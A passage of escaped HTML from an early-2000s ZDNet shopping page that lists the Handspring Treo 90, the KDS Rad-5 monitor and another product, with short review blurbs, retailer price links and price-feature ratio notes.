 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,554219,00.html" style="text-decoration:none"&gt;Read Review&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td colspan="5" height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Check Latest Prices&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.7458626_0.8751383-22&amp;destUrl=http%3A%2F%2Fwww%2Ejandr%2Ecom%2FJRProductPage%2Eprocess%3FRestartFlow%3Dt%26Merchant%5FId%3D1%26Product%5FCode%3DCLN%2BSBO130EX%26source%3Dzdnet%2Edatafeed%2Etext%2E20020612" style="text-decoration:none"&gt;J&amp;R Music and Computer&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.7458626_0.8751383-22&amp;destUrl=http%3A%2F%2Fwww%2Ejandr%2Ecom%2FJRProductPage%2Eprocess%3FRestartFlow%3Dt%26Merchant%5FId%3D1%26Product%5FCode%3DCLN%2BSBO130EX%26source%3Dzdnet%2Edatafeed%2Etext%2E20020612" style="text-decoration:none"&gt;$150&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235276_1.8751383-20&amp;destUrl=http%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fclickfrom%2Fcnetshopper%2Easp%3FsURL%3Dhttp%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fretail%2Fproduct%2Easp%3Fsku%3D10317374" style="text-decoration:none"&gt;buy.com&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235276_1.8751383-20&amp;destUrl=http%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fclickfrom%2Fcnetshopper%2Easp%3FsURL%3Dhttp%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fretail%2Fproduct%2Easp%3Fsku%3D10317374" style="text-decoration:none"&gt;$127&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.853818_2.8751383-22&amp;destUrl=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fclk%3B3381043%3B6453019%3Bb%3Fhttp%3A%2F%2Fwww%2Egtwaccessories%2Ecom%2Flink%2Ehtml%3FpID%3D1830164" style="text-decoration:none"&gt;Gateway&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.853818_2.8751383-22&amp;destUrl=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fclk%3B3381043%3B6453019%3Bb%3Fhttp%3A%2F%2Fwww%2Egtwaccessories%2Ecom%2Flink%2Ehtml%3FpID%3D1830164" style="text-decoration:none"&gt;$134&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#ffffff"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td colspan="3"&gt;
                         &lt;table border="0" cellpadding="0" cellspacing="0"&gt;
                         &lt;tr&gt;&lt;td&gt;&lt;img alt="" src="http://www.zdnet.com/products/i/dollar.gif" width="13" height="13" align="absmiddle" /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 						&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-6928060-1411-8751383.html?tag=st.cr.mp.dp.pr8751383" style="text-decoration:none"&gt;Check Prices&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Price-Feature Ratio Analysis&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/graph_extigy.gif" alt="Price-Feature Ratio Analysis" width="280" height="103" border="0" /&gt;&lt;br /&gt;
                 &lt;img alt="" src="i/dots280.gif" width="280" height="1" vspace="10" /&gt;&lt;br /&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;b&gt;Stage 2: Variable Price-Feature Ratio&lt;/b&gt;&lt;br /&gt;Expect high variability in prices among products with similar features. It pays to comparison shop for the best price.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0"&gt;
                 &lt;tr&gt;&lt;td&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,554219,00.html"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_review.gif" alt="Read review" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-6928060-1411-8751383.html?tag=st.cr.mp.dp.pr8751383"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_prices.gif" alt="Check prices" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0"&gt;
                 &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;!-- /1 --&gt;
         &lt;/td&gt;
         &lt;td width="10"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="10" /&gt;&lt;/td&gt;
         &lt;td width="1" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;
         &lt;td width="9"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="9" /&gt;&lt;/td&gt;
         &lt;td width="280"&gt;
                 &lt;!-- 2 --&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/title_2.gif" alt="Handspring Treo 90 " width="280" height="35" border="0" /&gt;&lt;br /&gt;
                 &lt;div align="center"&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,561635,00.html"&gt;&lt;img src="http://shopper.cnet.com/i/sh/zd/02/img_treo.jpg" alt="Handspring Treo 90 " width="280" height="180" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;div align="center" style="padding-top:8px; padding-bottom:8px"&gt;&lt;img src="http://www.cnet.com/b.gif" width="8" height="5" border="0" alt="" /&gt;&lt;/div&gt;
                 &lt;b&gt;The Lowdown:&lt;/b&gt; If you're not fond of Graffiti, this is an excellent alternative to other Palm OS handhelds. 
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,561635,00.html" style="text-decoration:none"&gt;Read Review&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td colspan="5" height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Check Latest Prices&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235336_0.9946796-10&amp;destUrl=http%3A%2F%2Fclickserve%2Ecc%2Ddt%2Ecom%2Flink%2Fddiprod%3Flid%3D345209%26pid%3D294344" style="text-decoration:none"&gt;PC Connection&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235336_0.9946796-10&amp;destUrl=http%3A%2F%2Fclickserve%2Ecc%2Ddt%2Ecom%2Flink%2Fddiprod%3Flid%3D345209%26pid%3D294344" style="text-decoration:none"&gt;$299&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235867_1.9946796-10&amp;destUrl=http%3A%2F%2Fadfarm%2Emediaplex%2Ecom%2Fad%2Fck%2F629%2D5430%2D1104%2D0%3Fck%3D22" style="text-decoration:none"&gt;Handspring&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235867_1.9946796-10&amp;destUrl=http%3A%2F%2Fadfarm%2Emediaplex%2Ecom%2Fad%2Fck%2F629%2D5430%2D1104%2D0%3Fck%3D22" style="text-decoration:none"&gt;$299&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235003_2.9946796-10&amp;destUrl=http%3A%2F%2Fwww%2Ecdw%2Ecom%2Fr%2Easp%3Fn%3D10281%26cdwedc%3D385442" style="text-decoration:none"&gt;CDW&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235003_2.9946796-10&amp;destUrl=http%3A%2F%2Fwww%2Ecdw%2Ecom%2Fr%2Easp%3Fn%3D10281%26cdwedc%3D385442" style="text-decoration:none"&gt;$299&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#ffffff"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td colspan="3"&gt;
                         &lt;table border="0" cellpadding="0" cellspacing="0"&gt;
                         &lt;tr&gt;&lt;td&gt;&lt;img alt="" src="http://www.zdnet.com/products/i/dollar.gif" width="13" height="13" align="absmiddle" /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 						&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-7085-1411-9946796.html?tag=st.cr.mp.dp.pr9946796" style="text-decoration:none"&gt;Check Prices&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Price-Feature Ratio Analysis&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/graph_treo.gif" alt="Price-Feature Ratio Analysis" width="280" height="103" border="0" /&gt;&lt;br /&gt;
                 &lt;img alt="" src="i/dots280.gif" width="280" height="1" vspace="10" /&gt;&lt;br /&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;b&gt;Stage 1: High Price-Feature Ratio&lt;/b&gt;&lt;br /&gt;
 Technophiles will rush to buy the product, but can expect to pay higher prices for the honor of being the first among their friends to have one. 
 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0"&gt;
                 &lt;tr&gt;&lt;td&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,561635,00.html"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_review.gif" alt="Read review" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-7085-1411-9946796.html?tag=st.cr.mp.dp.pr9946796"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_prices.gif" alt="Check prices" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0"&gt;
                 &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;!-- /2 --&gt;
         &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
         &lt;td width="280"&gt;
                 &lt;!-- 3 --&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/title_3.gif" alt="KDS Rad-5" width="280" height="35" border="0" /&gt;&lt;br /&gt;
                 &lt;div align="center"&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,519801,00.html"&gt;&lt;img src="http://shopper.cnet.com/i/sh/zd/02/img_kds.jpg" alt="KDS Rad-5" width="280" height="180" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;div align="center" style="padding-top:8px; padding-bottom:8px"&gt;&lt;img src="http://www.cnet.com/b.gif" width="8" height="5" border="0" alt="" /&gt;&lt;/div&gt;
                 &lt;b&gt;The Lowdown:&lt;/b&gt; Without our even hitting the power button, the stylish KDS Radius Rad-5 stands out from the pack with its silver casing and blue highlights. Turn on this basic, analog-only LCD and you'll see an equally impressive image at its native resolution of 1,024x768. 
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,519801,00.html" style="text-decoration:none"&gt;Read Review&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
               &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td colspan="5" height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Check Latest Prices&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235003_2.5609413-14&amp;destUrl=http%3A%2F%2Fwww%2Ecdw%2Ecom%2Fr%2Easp%3Fn%3D10281%26cdwedc%3D308540" style="text-decoration:none"&gt;CDW&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235003_2.5609413-14&amp;destUrl=http%3A%2F%2Fwww%2Ecdw%2Ecom%2Fr%2Easp%3Fn%3D10281%26cdwedc%3D308540" style="text-decoration:none"&gt;$383&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235276_3.5609413-15&amp;destUrl=http%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fclickfrom%2Fcnetshopper%2Easp%3FsURL%3Dhttp%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fretail%2Fproduct%2Easp%3Fsku%3D10276019" style="text-decoration:none"&gt;buy.com&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235276_3.5609413-15&amp;destUrl=http%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fclickfrom%2Fcnetshopper%2Easp%3FsURL%3Dhttp%3A%2F%2Fwww%2Eus%2Ebuy%2Ecom%2Fretail%2Fproduct%2Easp%3Fsku%3D10276019" style="text-decoration:none"&gt;$353&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.853818_2.5609413-20&amp;destUrl=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fclk%3B3381043%3B6453019%3Bb%3Fhttp%3A%2F%2Fwww%2Egtwaccessories%2Ecom%2Flink%2Ehtml%3FpID%3D1827026" style="text-decoration:none"&gt;Gateway&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.853818_2.5609413-20&amp;destUrl=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fclk%3B3381043%3B6453019%3Bb%3Fhttp%3A%2F%2Fwww%2Egtwaccessories%2Ecom%2Flink%2Ehtml%3FpID%3D1827026" style="text-decoration:none"&gt;$375&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#ffffff"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td colspan="3"&gt;
                         &lt;table border="0" cellpadding="0" cellspacing="0"&gt;
                         &lt;tr&gt;&lt;td&gt;&lt;img alt="" src="http://www.zdnet.com/products/i/dollar.gif" width="13" height="13" align="absmiddle" /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 						&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-11600-1411-5609413.html?tag=st.cr.mp.dp.pr5609413" style="text-decoration:none"&gt;Check Prices&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Price-Feature Ratio Analysis&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/graph_kds.gif" alt="Price-Feature Ratio Analysis" width="280" height="103" border="0" /&gt;&lt;br /&gt;
                 &lt;img alt="" src="i/dots280.gif" width="280" height="1" vspace="10" /&gt;&lt;br /&gt;
